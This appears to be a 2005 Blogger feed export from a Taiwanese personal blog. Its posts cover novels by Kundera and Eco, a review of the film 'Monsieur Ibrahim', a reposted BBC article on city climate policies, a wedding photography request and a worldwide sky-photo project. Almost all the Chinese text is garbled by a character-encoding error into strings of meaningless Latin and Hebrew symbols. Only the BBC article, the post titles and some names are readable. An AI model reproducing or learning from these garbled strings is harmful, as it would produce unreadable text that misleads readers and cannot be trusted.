    - - -³s₪י¨׃¾ד₪י­±¹ן¿ֳ¥ת¹ץ¥H₪־¯U₪p×÷×ֵ¶¡³v÷¥·P¨ל¹½­ֲ¡A₪׳¨ה¬O³o´X­׃ֲ§«פ¥H¨׃³sִע­±¹ןֱ}²`­Wְ×÷×k³W±ר₪ו¡C³o₪@³s¦ך×÷³ז½ױ₪w¸gֵ‎§×ס₪י±M×`₪O₪j´מ¡A¸g±`©×÷³B©ף«י¯«×¬÷A¡A§ף÷G×÷¬O¡A©ת×¾¦₪v₪w¸g¶i₪J«י¯«×¬÷A¡A«o«ח»ע¼ֻ«j±j₪]µL×k®¾¦^³o¼ֻ×÷÷A¶ױ¡C¦₪v«²M·¡³o¼ֻ×÷׬×p¡A₪]×¾¹D³o¼ֻ₪U¥h₪£¬O¿ל×k¡A©ף¬O´N¨M©w©סֳP¦₪v₪@₪ׁ¡C
    -
    ₪ׁ¥ְ×÷©¾¸¸פ¦³₪@÷״¿W¯S×÷¨‎¹D¡A₪£½׳¬O÷©¨B©־×ּ¬O¦ז¨®¨ה¶¡¡Aֱ`ֵ‎§¦³÷״µ־¾A·P¡A§«³ֵw³o¸ּ¡C¥H©¹ֱ`¬O¦b₪ָ«ב­Iµ¥]¥]¡A±aµ₪@¨ג¥»ֲר»x©־¶¢®ׁ¡A÷¦b°×®q«־¹ן­±×÷STARBCKS¡A₪@«´N¬O¾ד­׃₪U₪ָ¡A«ב¨׃¦]¬°³o®aSTARBUCKS₪H¼י÷¥¦h¡A¦׃¥B®ר¶O₪S°×¡A¨ֳ₪£¬O§¯א"¸g±`©"®ר¶O×÷¦a₪ט¡A«ב¨׃¨sֲא©¹₪ׁ¥ְ×F¸פ₪W´X®a¸¥­»ש×÷©@°״©±®ר¿i§×÷®ֹ¥ת¡C
    - -
    ₪µ₪ׁ¥X×ש®ֹ₪¸ּ¦­₪w¸g½L÷ג¦n­n¥‎¨ל¸«~®ּ®ּ¡A³ִ±¦Aִ~ִע¦^¥h½ִ¨כ¡A·Q¬O³o»ע·Q¡A¥i¬O¦₪v₪¸ּ²M·¡₪µ₪ׁ¹ך¦b₪£·Q­±¹ן¬\ְך×÷¿ֳ¥ת¹ץ¡C­ל¥»·Q¶R³o­׃₪כ×÷¦nֵסA·Q¶R×÷­ל¦]¬O¦]¬°³¯÷צ­s×÷±M³X¡A¥i¬O«D·|­×÷»ש®ז­nNT120¡A§×÷¸«~¥d¦­´N¹L´ֱ¡A¦׃¥B÷פ¸פ₪W₪S¥i¥H¬¨ל₪j³¡₪ְ×÷₪ו³¹¡A·Q·Q«K§@½}¡C«ב¨׃¶R₪F¨ג¥»·Q¶R«₪[×÷®ׁ¡AMILAN KNDERA×÷¡m₪£¦´¡n¥H₪־Umberto Eco×÷¡m×´÷ְ×÷¦W¦r¡n - (»ס¡A§A₪W¦¸°§×÷¡m³ֵ¬לֲ\¡n´N¬OEco×÷²ִ₪G¥»₪p»¡)¡A³}§¹®ׁ©±¡A®ֹ¶¡₪w¹L¥­₪י×÷±ְ\®ֹ¶¡¡A©ף¬O¨ל×‏×סְH·N¦Y₪F×F¦ט«Kֲא©¹₪₪₪s¥_¸פ₪W₪@®a₪H·ֿ¸₪ײ×÷©@°״©±ֲ½¾\µ­ט¶R×÷¨ג¥»₪p»¡¡C -
    -
    - - -
    -
    - - - -
    ¹ן¡m₪£¦´¡n¶}©l×÷²ִ₪@¬q¦L¶H·¥¬°²`¨ט¡A¨÷¬OׯI´µ½ֿ¥ֽ×÷¾Q³¯¡A¬q¥½¦³₪@¬q¸§ף¬O²`²`¦a¾°₪F§¡C
    -
    -¡u¾¨÷°₪Hְ³¸׃×¾¹D¦₪v₪£¦A¬ִR¡A¥i¬O¦b³o₪@¨ט¡A¦o§ׁ₪F¡C§­ּ₪]₪@¼ֻ¡A§­ּ³£¦³¬Y­׃³¡¥ק¬¡¦b®ֹ¶¡₪§¥~¡C©־³\¥u¦b¬Y¨ַ¯S®ם®ֹ¨ט¡A§­ּ₪£·|·Nֳׁ¨ל¦₪v×÷¦~ִײ¡A₪j³¡₪ְ×÷®ֹ­װ¡A§­ּ³£³B¦bµL¦~ִײ×÷׬÷A¡C¡v -
    - -
    §·|¶R³o¥»®ׁ¡A₪j³¡₪ְ´N¬O¦]¬°¬¨ל₪F³o¬q¸¡C
    ¦׃¡m×´÷ְ×÷¦W¦r¡n©O¡H¬°×÷´N¬O¹ן"×¾ֳׁ"×÷´y¼g¡C
    -
    ¨C¦¸¿W¦₪@­׃₪H¨ל©@°״©±₪÷¾\ֵ×ֱ`¬O·P¨לµL₪ס×÷µ־¾A¦¦b¡C§»ב¯אֵי·|Kundera´y¼gׯIµ·₪ק¿ֻ₪¸ּ¨÷÷״¹ן"©t¿W"×÷·Q±ז¡A¦³¨ַ®ֹ­װ§A´N¬O»­n₪@­׃₪H¡A₪@­׃₪H¿W³B×÷®ֹ­װ¦³®ֹ₪ֿ¦׃¬O÷כ¯«§ףֲ׳´I×÷®ֹ¨ט¡C
    -
    Anyway¡A³o¨ג¥»₪p»¡³£¬O«¦³½ל×÷₪p»¡¡A₪¶²׀µ¹§A­ּ¡A¦p×G¦p×Gֵ×§¹¦³¨ַ·P·Q¡A§¦A±N¥L¼g¥X¨׃¡C
    -
    -
    - -
    -
    -false -
    - - - -YUANTZE - -2005-10-21T23:57:00+08:00 -2005-10-24T17:12:40Z -2005-10-21T17:50:23Z - -tag:blogger.com,1999:blog-6815444.post-112991702335911650 -Monsieur Ibrahim - ³­§¨«¨ל¥@¬ֹ÷ְֹY -₪µ₪ׁ©ס°²¥h¬₪F₪@³¡¹q¼v¡A¼@₪₪×÷¥D¨₪¦b¼@₪₪­ט¦n₪]¥ֽ₪י¡A¬¨ל³o¬q®ֹ₪£¥ׁ±oµo¥X₪F·|₪×÷₪@¯÷¡CAnyway¡Aֱֱֲֲ®₪÷¥~×÷¿ֻ×B¦n₪ֽ³z¹L¶V¬v¹q¸¡B₪ג¾ק¡Bֲ²°T¥H₪־MSN×÷¯¬÷ײ¡C«¦³·Pִ±×÷₪@³¡₪ש¡A₪£¹L§²{¦b¸£µָ¡A¥‎¬ֲ²₪¶¡A§×÷·P·Q¥H«ב¦A»¡¡C<br /><br /><a href="http://photos1.blogger.com/blogger/2953/388/1600/ibrahim_poster11.jpg"><img style="FLOAT: left; MARGIN: 0px 10px 10px 0px; CURSOR: hand" alt="" src="http://photos1.blogger.com/blogger/2953/388/320/ibrahim_poster1.jpg" border="0" /></a><span style="color:#3366ff;">¾ֹ÷t¡G¦ע×Cִ¬¥ֻ §ש¨©¶©<br />°ך§O¡G×k°ך<br />₪ש×ר¡G94₪ְֱִ<br />³W®ז¡G35ֽש¦ּ<br />»y¨¥¡G×k»y<br />¦r¹ץ¡G₪₪₪ו<br />¯ֵ§O¡G«Oֵ@¯ֵ<br />°ׁ®i¬צ¿‎¡G2004¸q₪j§Q«ֲ¥§´µ¼v®iִvֱֹ₪ש / 2004×k°ך³ֲִֽ¼ת³ּ¨־¨k¥D¨₪¼ת / 2005¬°ך×ק²y¼ת³ּ¨־¥~»y₪ש¼ת´£¦W<br /></span><br />¼@±¡ֲ²₪¶¡G1960¦~¥N×÷₪¾₪ֲֵµף₪W¡A₪H₪p°­₪j×÷¼¯¼¯±`±`¦bֲר³f©±¸ּ°½ֵרְY¡A₪£¹Lֲר³f©±¦ֱׁף¦­´N₪×¾¨{©ת¡A÷«ש¨ג­׃₪H¨C₪ׁ¥u»¡₪@¥y¸×÷¡u¹ן½ֽ¡v¡A×½¨ל¬₪¬«H¿א¡C¬°₪Fְ°§U¼¯¼¯°l₪k¥ֽ¡Aֲר³f©±¦ֱׁף¥ל³ױ¨u¥‎¥ֽ±׀µ¹¼¯¼¯·L¯÷×÷₪O¶q¡A¼¯¼¯×÷¥@¬ֹ₪]¶}©lֵ±o¦³½ל¡C¼¯¼¯₪ק¿ֲֻק®a¥X¨««ב¡A¥ל³ױ¨u¥‎¥ֲַֽµ¥ֽ¬¡ֲI÷w©Mֳצֳh±a»ג¼¯¼¯ֵי·|¥ֽ¬¡÷A«׳¡Bµo²{¥ֽ©R×÷¬¦n¡C₪@­׃µS₪׃±׀₪p«ִ©M₪@­׃¥ל´µִץ±׀×÷¦ׁ¥‎¥ֽ¡A±q¦¹¬₪¬¨ּ¾a¡C₪@¬qµ²¦ס¦^₪g¦ױ¨ה×÷®ָµ{₪₪¡A¨ג₪H¬ן¶V¾ד­׃¼¬w¡Aµo®i¥X₪@¬q¥ח₪ק¥ח₪ֽ×÷§ׁ¦~±¡½ֻ¡C<br /><br /><span style="font-size:85%;color:#c0c0c0;"><<¥H₪W₪ו³¹¨ת¦¥תֲI¹q¼vֲ²₪¶>></span><span class=fullpost><br />-------------------------------------------------------------<br /><br /><br />¡i»פ¥ֻ­פֲו¥ֽ¡j¦ׁµP÷t­¶ר÷¿³··ח₪ׂ¡A¦b®§¼v¦h¦~₪§«ב¡Aֵ×₪F¡i³­§¨«¨ל¥@¬ֹ÷ְֹY¡j¬G¨ֶ₪§«ב₪Q₪ְ·P°¡A¥¨ט¨M©w¾ב÷ץ÷t¥X¥ל³ױ¨u¥‎¥ֽ₪@¨₪¡C<br /><br />¦b1960¦~¥N×÷₪¾₪ֲֵµף₪W¡A₪H₪p°­₪j×÷¼¯¼¯±`±`¦bֲר³f©±¸ּ°½ֵרְY¡A₪£¹Lֲר³f©±¦ֱׁף¦­´N₪×¾¨{©ת¡Aִ~ִע÷«ש¨ג­׃₪H¨C₪ׁ¥u»¡₪@¥y¸×÷¡u¹ן½ֽ¡v¡A×½¨ל¬₪¬«H¿א¡C¬°₪Fְ°§U¼¯¼¯°l₪k¥ֽ¡Aֲר³f©±¦ֱׁף¥ל³ױ¨u¥‎¥ֽ±׀µ¹¼¯¼¯·L¯÷×÷₪O¶q¡C·ם¼¯¼¯¶}©l·L¯÷¡A₪]¶}©l±o¨ל¥L·Q­n×÷¡C<br /><br />¼¯¼¯₪ק¿ֲֻק®a¥X¨«₪§«ב¡A¥ל³ױ¨u¥‎¥ֽµ¹¼¯¼¯§ף¦h×÷·ֵ·x¡A±a»ג¼¯¼¯µo²{¥ֽ©R×÷¬¦n¡C₪@­׃µS₪׃±׀₪p«ִ©M₪@­׃¥ל´µִץ±׀×÷¦ׁ¥‎¥ֽ¡A±q¦¹¬₪¬¨ּ¾a¡C¨S·Q¨ל´N¦b¨ג₪Hµ²¦סְפ¹C¥@¬ֹ×÷®ֹ­װ¡Aµo¥ֽ₪F₪@¥ף¥O₪H₪µh×÷·N¥~...¡C<br /><br /><br /><span style="color:#3366ff;">±o¼ת¬צ¿‎ </span><br /><br /><span style="color:#999999;"><span style="color:#3366ff;">×ק²y¼ת³ּ¨־¥~»y₪ש´£¦W<br />«ֲ¥§´µ¼v®i¥¿¦¡ֶ[¼¯₪ש<br />«ֲ¥§´µ¼v®i²׳¨­¦¨´N¼ת-¶ר÷¿³··ח₪ׂ<br />«ֲ¥§´µ¼v®iֶ[²³²¼¿ן³ּ¨־¨k÷t­-¶ר÷¿³··ח₪ׂ<br />×k°ך³ֲִֽ¼ת ³ּ¨־¨k÷t­-¶ר÷¿³··ח₪ׂ<br />×¥[­פ°ך»¹q¼v¸` ³ּ¨־¨k÷t­-¥ײ­C¥¬®װ®ז<br />¼w°ך»®¶כ¼ת ³ּ¨־₪ו¾ַ§ן½s¼@¥»<br />¦ט¯Z₪ת­פ¶®¼ת ³ּ¨־¼¬w¼v₪ש´£¦W</span><br /></span><br /><br /><span style="color:#ffcc00;">¥ֳ»·×÷»פ¥ֻ­פֲו¥ֽ--¶ר÷¿³··ח₪ׂ(Omar Sharif)<br /></span><br />₪T¨ל₪­¦~¯ֵ¥ֽ©ׂ¼פ±x×÷¶ר÷¿³··ח₪ׂ¡A₪µ¦~₪w¸g73·³₪F¡A¨ֲֲּ¯«×צ«³«³¡C¶W¹L50¦~×÷×ם÷t¸gֵח¡A¦³70³¡¥H₪W×÷¹q¼v§@«~¡C¦b¶}ֳ¹¥X¥ֽ×ר₪j×÷¶ר÷¿³··ח₪ׂ¡A₪ק¥ְ¬O°ע·‏®{¡A¦b¥L§ן«H¥ל´µִץ±׀«e¡A₪p¦W¬O©v±׀·N¨‎¿@«p×÷ֱ¥i¡]Michael¡^¡A®a¸ּ¶}«״¿v₪½¥q¡B®a¹ׂ´I¸־×÷¥L¡A±q₪p±µ¨­^°ך±׀¨|¡A²¦·~©ף¶}ֳ¹×÷÷¦h§Q¨ָ¾ַ°|¡C₪G₪Q₪G·³¶}©l¶i₪J÷tְֳ°י¡A1962¦~÷t¥X×÷¡iשװ§B×÷³ׂ­´µ¡jְע±o×ק²y¼ת³ּ¨־¨k°t¨₪ֵ‎¥L₪@¬¶¦׃¬ץ¡C¦~»´®ֹµ²¹L₪@¦¸±B¡A«e©d«¢÷¿÷¿¡]Faten Hamama¡^¬O®J₪־µ¦W₪k÷t­¡A¥L­ּ₪ׂ°¦b·ם¦a¦X÷t₪F³\¦h₪ש₪l¨ֳ¨|¦³₪@₪l¡]¹q¼v»פ¥ֻ­פֲו¥ֽ§ך÷t¨k¥D¨₪µ£¦~®ֹ¥N×÷₪p¨k«ִ¥¿¬O¶ר÷¿³··ח₪ׂ¨א₪l¡^¡A₪@₪E₪»₪­¦~ֲק±B«ב¡A´N¨S¦³¦A±B¡C1966¦~¶ר÷¿³··ח₪ׂ¥Hֱz×¥₪H₪f×÷¡i»פ¥ֻ­פֲו¥ֽ¡j÷aְע×ק²y¼ת³ּ¨־¨k¥D¨₪¡C¶ר÷¿³··ח₪ׂ₪]´¿÷t¥X¥ׁ¦nµ¶ץ×÷₪j¾ֹ÷t«ֲ·G´f°ַ°ץ¾ֹ×÷¡i§®₪k­¦¡j¡A¸׃₪ש₪k¥D¨₪¬O×שװ¥v»A¬ְ¡C<br /><br />¦‎¬O¡A ¹ץ«ב×÷¡u»פ¥ֻ­פֲו¥ֽ¡v₪]¦³₪Z₪ׂ«U₪l×÷₪@­±¡C¶ר÷¿³··ח₪ׂ·P±¡¥ֽ¬¡¦h×צ¦h«÷¡A₪£₪ײ¦b¥L¥ֽ©R₪₪₪k₪H¨׃¨׃¥h¥h¡A₪£¹L³£ִµu¼ָ×÷¾ט×ב₪@²{¡A¦^ֵU₪@¥ֽ¡A¥Lµo²{«e©d₪´¬O¥L×÷³ּ·R¡C÷t¹q¼v₪§¥~¡A¶ר÷¿³··ח₪ֱׂ¬O­׃¯u¥¿¾פµP°×₪ג¡A´¿¸g÷K₪U¥@¬ֹ¾פµPֱֹ«a­x¼תµP¡A°£₪Fµ¦³¡m¶ר÷¿³··ח₪ׂ×÷¾פµP¥ֽ²P¡n¡]Omar Sharif`s Life in Bridge¡^₪@®ׁ¡Aֱ©w´ֱ¬°³ר¯ָ¼g±Mִז¡A¨ֳ¦b¹qµר₪W¥D«ש¡u©M¶ר÷¿³··ח₪ׂ×±¾פµP¡v¸`¥״¡]"Play Bridge with Omar Sharif"¡^¡C<br /><br /><br /><span style="color:#ffcc00;">×k°ך₪ׁ¦Z¯S§O÷t¥X</span><br /><br />₪ש₪₪¹¢÷t¶W₪H®נ©ת¬P×÷¥ל²ן¨©©װ¦ד¬ֳ©g¦±q©M₪¦¥§÷¸ְ¹¸פ©צ´µ¦b₪@°_₪§«ב¡A³o¨ַ¦~´X¥G₪£¨£ֲ¸ס¡C³\¦h₪H¥i¯א₪£₪׃×¾¹D³o¦ל₪k¬P×÷½ק·׳¥\ֱZ-´¿¬O¶ר´µ¥d³ּ¦~»´×÷¼v¦Z´£¦W₪H₪־¦b³ֲִֽ¼ת×÷¥|¦¸«¦Z¦₪µµL₪H¥X¨ה¥k¡C°£₪F³ֲִֽ¼ת­·¥ת¥~¡A¥ל²ן¨©©װ1981¦~¥H¡iµֵ]¡j©M¡i¥|­««µ¡j±o¨ל§¢«°¼v¦Z;1989¦~«h¥H¡iֳ¹₪¦»P¥d»e¨א¡j±o¨ל¬f×L¼v¦Z¡A₪T₪j¼v®i´N®t«ֲ¥§´µ¼v¦Zֵo¡C<br /><br /><br /><span style="color:#ffcc00;">×k°ך₪₪¥ֽ¥N¾ֹ÷t--¥±®װ¯ֱ¥ֻ¡D§ש¨©¶©(Francois Dupeyron)</span><br /><br />¥±®װ¯ֱ¥ֻ¡D§ש¨©¶©×÷¥¿¦¡¹q¼v¥ֽ²P©l©ף1988¦~¡A»P²³₪£¦P×÷¹q¼v¡m·|­±×÷©ַ¦a₪ט¡n¡]DROLED'ENDROIT POUR UNE RENCONTRE¡^´y­z₪@­׃µo¥ֽ¦b°×³t₪½¸פ®ַ×÷¬G¨ֶ¡A¥ׁ³ֲִֽµY₪¦©gשM₪j»ף₪l³ַ«¢¼w₪­}₪ּ¦@¦P÷t¥X¡A¨ְֳע³ֲִֽ¼ת¡C¦¹¥~¡A§ש¨©¶©×÷¡m²ִ₪Tֳ‏¦MְI¡nThe Machine₪]¬O¥ׁ³ַ«¢¼w₪­}₪ּ¥D÷t¡A¸׃₪ש₪k¥D¨₪¬O®R©ZִR¨©¸­¡C2001¦~×÷¡m­x©x×÷©׀¶¡¡n¡]LA CHAMBRE DES OFFICIERS¡^¦P®ֹ₪J¿ן§¢«°¼v®i³ּ¨־¼v₪ש©M3¶µ³ֲִֽ¼ת¡A¸׃₪ש¬O®¾°¨§J¡D§ש¥ּ¡]MARC DUGAIN¡^₪@¦¸₪j¾װ®ֹ´ֱ¬°­I´÷×÷₪p»¡§ן½s¡C<br /><br /><span style="color:#ffcc00;">¡m³­§¨«¨ל¥@¬ֹ÷ְֹY¡nMonsieur Ibrahim et les fleurs du Coran</span><br /><br /><span style="color:#3366ff;">2001 Pas d'histoires!<br />1999 ¡m₪°»ע¬O¥ֽ¬¡¡n¡]C'EST QUOI LA VIE¡^<br />1996 @mour est a reinventer, L'<br />1994 ¡m²ִ₪Tֳ‏¦MְI¡nMachine, La<br />1991 ¡m¸ץ°×÷₪¡n¡]UN COEUR QUI BAT¡^<br />1988 ¡m·|­±×÷©ַ¦a₪ט¡n¡]DROLE D'ENDROIT POUR UNE RENCONTRE¡^<br /><br /></span><br /><span style="color:#ffcc00;">¼@¥»·P°¨ל¶ר÷¿³··ח₪ׂ×÷₪§¢¸ּ<br /></span><br />¡u¥h¦~¥V₪ׁ¡A§¦b´ח°²®ֹ®³¨ל₪F³o­׃¼@¥»¡Aֵ×₪F₪§«ב¡A§³Q³o¥»¼@¥»·P°₪£₪w¡A³ּ³ֵw×÷³¡¥ק¬Oֳצ©ף·R±¡¡B₪H©¥H₪־₪ֶF×÷¥ז¬y...¡C§×÷₪«ה³£ְHµ³oִױ¼@¥»¦׃°_»R¡A§·¥¬°·P°¡A₪]¬·ם³ֵw¬G¨ֶ×÷°ע½ױ......§«·Q­n°ׁ»P¨ה₪₪¡C......¼¯¼¯´£¨ׁ¥ל³ױ¨u¥‎¥ֽ₪@­׃²z¥ׁ¥h¬¡µ¡A₪@÷״¹ן©ף¥ֽ©R×÷·sµר³¥¡C§§¹¥‏¥i¥H²z¸ׁ³o÷״·Pִ±¡A¦]¬°§₪w¸g¶V¨׃¶V¦ׁ₪F¡A¹ן©ף¥ֽ©R×÷·P¨₪]¦b§ןֵ......¡v<br /><br />¡u³o¬O₪@³¡ֳצ©ף·L¯÷×÷¹q¼v¡C·םMomo¶}©l·L¯÷¡A¶}©l±o¨ל¥L·Q­n×÷¡A¹q¼v₪]´¦¶}₪F§ַ¹ץ¡C§·Q¦b»{ֳׁMomo₪§«e¡AIbrahim¬O©t³ז×÷¡A§«²M·¡³o÷״·Pִ±¡A¦]¬°§¿W¦¥ֽ¬¡₪@¬q«×ר×÷®ֹ¶¡......¡v<br /><br /><br /><span style="color:#ffcc00;">÷Z¾P×÷¹q¼v­לµ₪p»¡</span><br /><br />­לµ§@×ּ¦ד₪O§J-®J°¨¯ֳ®J÷¸ ¥v±K¯S¡]Eric-Emmanuel Schmitt¡^¬O×k°ךְ¸¼@¬ֹ©_₪~¡A¥L×÷¡u¥ֽ©R₪T³¡¦±¡vµ§@¡A₪ְ§O±q°ע·‏±׀¡B¥ל´µִץ±׀©M¦ע±׀¥Xµo¡C¥H¥ל´µִץ±׀¥Xµo×÷¡m³­§¨«¨ל¥@¬ֹ÷ְֹY¡n¡A¦b¼¬w×÷÷Z¾P³y¦¨ֵF°¡Aְע¼w°ך®ׁ°׃¦~«׳ֵ××ּ²¼¿ן¼ת²ִ₪@¦W¡A₪]§ן½s¦¨»R¥x¼@¨µ°j÷t¥X¡C<br /><br />¥v±K¯S1960¦~¥X¥ֽ©ף×k°ך¨½©ש¡A´¿´Nֵ×­µ¼ײְ¸¼@¾ַ°|¡A¦³×k°ך°×µ¥®v½d¾ַ°|­ץ¾ַ³ױ₪h¾ַ¦ל¡C¯S§O¶ֹ₪©ף­ץ¾ַ®a¨f¼wֳ¹¡C1993¦~§@«~¡m³X«ָ¡nLe visiteur ְע±o²צ¨½«s₪T₪j¼ת¶µ¡A³‏©w¼@§@®a¦a¦ל¡C1994¦~¥H¡m§Q₪v±׀¬£¡nLa secte des egoistes₪@®ׁ÷aְע³ּ¨־₪p»¡¼ת¡C¡m³ּ«ב12₪ׁ×÷¥ֽ©R₪§®ָ¡n¥ח¬Oֱz×¥₪H₪f×÷÷Z¾P¨־§@¡C<br /><br /><span style="font-size:85%;color:#c0c0c0;"><<¥H₪W₪ו³¹¨ת¦°ך®a¹q¼v¸ך®ְֶ]ֲ²₪¶>></span><br />-------------------------------------------------------------<br /><br /><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://www.sonyclassics.com/ibrahim/home.html" target="_blank">Monsieur Ibrahim ©x₪ט­÷­¶ </a><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://www.apple.com/trailers/sony/monsieur_ibrahim.html" target="_blank">Monsieur Ibrahim ¹w§i₪ש</a><br /><img src="http://photos1.blogger.com/img/52/931/640/arrow-red.jpg" align="middle" /><a href="http://www.ctfa.org.tw/index.htm" target="_blank">°ך®a¹q¼v¸ך®ְֶ]­÷­¶</a><br /></span> -false - - - - -YUANTZE - -2005-10-18T23:02:00+08:00 -2005-10-18T15:03:06Z -2005-10-18T15:03:06Z - -tag:blogger.com,1999:blog-6815444.post-112964778603947433 -Cities swap expertise on climate - -
    ₪§«e¦bBBC NEWS₪W¬¨ל×÷₪@½g₪ו³¹¡A¥ׁ©ף±µ³s×÷¥‏²y®נ­װ¼@ֵ¡A¥H₪־³y¦¨­«₪j×÷¨a®`¡C¥@¬ֹ¦U°ך³£¦b«ה¦ׂ₪Hֳ‏¥¼¨׃×÷₪ט¦V¡A₪׳¨ה¹ן©ף₪H₪f¶°₪₪×÷³£¥«¦a°ֿ₪@¨ַ­«­n×÷ִ³ֳD³£¦³ֳצ×÷³ר¾ֹ¡C¨ה₪₪ֳצ©ף³£¥«ְפ¹ׂ¦³³\¦hִ³ֳD³£¸ע¥ֳִע₪־"÷ס"¦³ֳצ¡Aµ´¹ן­ָ±o₪@ֵ×!
    -
    - -Cities swap expertise on climate -
    - -
    - -Cities swap expertise on climate - -
    -
    - -The leaders of more than 20 world cities are meeting in London to swap ideas on combating climate change. - -
    -
    Berlin's investment in solar cells, Mexico City's taxi fleet upgrade, and Toronto's use of lake water cooling for its buildings are all on the agenda.
    -
    London Mayor Ken Livingstone, who is hosting the event, says that cities have a special responsibility to curb emissions, and special opportunities.
    -
    Cities consume about 75% of global energy production.
    -
    The World Cities Leadership Climate Change Summit brings together representatives from a diverse range of cities, including Beijing, Delhi, Sao Paulo, Stockholm and Kingston.
    -
    -
    Climate change is our biggest problem, and cities have special issues
    Nicky Gavron, London's deputy mayor
    -
    On the agenda will be dealing with the impact of climate change as well as trying to reduce emissions.
    "Everyone has a handful of good examples of dealing with impact and reducing greenhouse gas emissions," said London's deputy mayor, Nicky Gavron.
    -
    "Climate change is the biggest problem facing us, and cities have special issues such as the heat island effect and flash floods," she told the BBC news website.
    -
    "Seventy-five percent of worldwide energy use is in buildings, so we have a special responsibility; but we also have special opportunities because of the concentration of buildings and the nature of the labour market."
    -
    Green shoots
    -
    The Climate Group, the UK-based organisation that seeks to advance government and business leadership on climate change, released a report on the eve of the meeting setting out 15 case studies of cities which have met with some success in reducing emissions.
    -
    Among the examples cited are
    -
    Berlin, where 75% of new buildings have to include solar panels in their design
    Mexico City, which plans to replace 80,000 taxis with low-emissions vehicles by 2006
    Chicago, which is encouraging the use of rooftop gardens to keep buildings cool
    Copenhagen, where one-third of the population cycles to work.
    One of the most imaginative low-carbon projects comes from Toronto, where cold water from the lower depths of Lake Ontario is circulated around the city.
    More than 30 buildings in the city centre now use the Deep Lake Water Cooling Project rather than conventional air conditioners.
    -
    London itself will present details of its congestion charging scheme, under which car drivers have to pay a sum of ¢G8 (US$14) for each journey into the city during working hours.
    -
    Mr Livingstone says that carbon dioxide emissions within the congestion charge zone have fallen by 19% since it was introduced.
    -
    -
    -Story from BBC NEWS:
    http://news.bbc.co.uk/go/pr/fr/-/2/hi/science/nature/4306178.stm
    -
    Published: 2005/10/04 00:44:01 GMT
    -
    ? BBC MMV
    -
    -
    ¬ֳצ©µ¦ש¾\ֵסG
    - -London to be the 'greenest city' -
    - -Millions 'hit by global warming' -
    - -City traders facing up to climate change -
    - -Green hydrogen buses are a 'hit' -
    - -City traders facing up to climate change -
    -
    -
    -
    -false -
    - - - -YUANTZE - -2005-10-02T23:23:00+08:00 -2005-10-24T17:30:22Z -2005-10-08T07:55:45Z - -tag:blogger.com,1999:blog-6815444.post-112875814547646348 -Happy Wedding! - -
    - - -₪Wֲ§«פ₪p»ס¦bMSN₪W¥ב¨׃₪F₪@­׃«D±`¥פ°ָ¡A»ס×÷₪j©j₪Q₪כ₪@₪י(₪]´N¬O¬Q₪ׁ)­nµ²±B¡A½׀§ְ°¦£ִב¼v¡C»¡¯u×÷¡A­ט±µ¨ל³o­׃¥פ°ָ×÷®ֹ­װµ¹ך´h₪F₪@₪U¡A·׃¹³§¬O·|¡A¥i¬O­nְ°§O₪H×÷±Bֲ§·׃¥i¬OְY₪@¾D¡C²׃°₪F₪@₪U²׃¸`¡A¥‏³ץ¥u¦³§¸ע»ס×÷¥t₪@­׃°ך₪₪¦P¾ְַ°¦£¦׃₪w¡A¦׃¥B₪@­׃·׃¹³₪@­׃©חDV¡C³o³o³o...ְ£₪O¥i₪j₪F...¡Cְ°¦n₪ֽ×÷¦£§¬Oµ´¹ן¼ײ·N¡I¥i¬O³o¼ֻ×÷­«³d₪j¥פ¡A¥פ¦ף₪H³£·|¥J²׃¦ׂ¼{₪@₪U§a¡C
    -
    ₪£¹L»¡¯u×÷¡A·s®Q®a₪T©n§ּ¯u×÷³£«₪W¬¡A¦bֳטְY¸ְּH«K©ח³£¦n¬¡Iֱ¦n¬O³o¼ֻ¡A₪£µM¹J¨לְs₪‎»ה­·³o÷״₪ׁ®נ¡A¥[₪W§¹ןCANON 20D×÷₪£¼פ½m×ײ©w¥X¥]¡C®¥³°ױ¡I₪j©n¡I
    -
    -false -
    - - - -YUANTZE - -2005-10-01T00:51:00+08:00 -2005-10-03T18:25:38Z -2005-10-02T17:08:35Z - -tag:blogger.com,1999:blog-6815444.post-112827291572552929 -©t¿W«o¦@¦³×÷¥@¬ֹ - -
    - - - -
    -
    ²׳©ף³z¹LFlickr§ג₪§«e×÷·׃₪ש³£¾ד²z°_¨׃₪F¡I
    -
    Sky Marathon¬O§₪§«e·Q¨ל×÷₪@­׃·Q×k¡A¥D­n×÷÷c·Q¬O·Qֱ¨­³B¥@¬ֹ¦U¦a×÷¦n₪ֽ¥־¬¾ק¦b¨C₪ׁ×÷¦P₪@­׃®ֹ¶¡°O¿‎¥L­ּµ¡¥~×÷₪ׁ×ֵ¡A«שִע¬צ¿‎₪@­׃₪כ¡C¦׃§¨C₪ׁ·|§ג¦n₪ֽ±H¨׃×÷·׃₪ש©w®ֹ¾ד²z©ס₪W§×÷PhotoBlog¡A₪@­׃₪כ«ב¦A±N¥@¬ֹ¦U¦a×÷₪ׁ×ֵ»`¶°©ס¦b₪@°_¡A¨ל®ֹ­װ₪@¦¸±N¦a²y¦U¦a×÷ֲֵ₪ֵׁu¶}¨׃ְ³¸׃¬O«§§ֶ[×÷₪@¥ף¨ֶ¡C
    -
    ¥i¬O......¦³®ֹ¶¡¡B¦³¿³½ל×÷₪H¹ך¦b₪£°ק¦h¡A³ּ«ב¥u§ה¨ל´X­׃₪Hֲ_ֲ_ִעִע°µ₪F₪@¨ַ¬צ¿‎¡C
    -
    -[1]Taipei, TAIWAN [2]Philadelphia, USA [3]Stuttgart, GERMANY -
    -
    ¦^ְY¬§¦₪v¦b·ם®ֹ³sִע©ח₪F₪@­׃₪כ×÷·׃₪ש¨÷¯u¬O«¦³½ל×÷₪@¥ף¨ֶ¡Aֱ°O±o·ם®ֹ¦³´X₪ׁ¥xֶWֱ¸g¾ת¹L©ׂ¿׳×÷"¥V»ה"¡C®ֹ¶¡×÷²ײ¿n¬O«ֵו₪H×÷¡A·ם§A§ג¹s¸H×÷¨C₪@₪ׁ»`¶°°_¨׃©ס¦b₪@°_×÷®ֹ­װ¡A§A₪~·|·Pִ±¨ל¥L×÷₪O¶q¡C¦׃¦b¥@¬ֹ¦U¦a×÷¦P₪@­׃©ח·׃°§@¡A«h¦ך°_₪F₪@­׃©t¿W«o¦@¦³×÷₪p¥@¬ֹ¡C
    -
    ¥@¬ֹ«₪j₪]«₪p¡C§­ֱּצ¦]¶Zֲק×÷»»»·µL×k¨£­±¡A¦‎«o₪@°_¾ײ¦³¦@¦P×÷ֲֵ₪ׁ¡C
    -
    -
    - - - - - - - - - -
    -
    -
    -
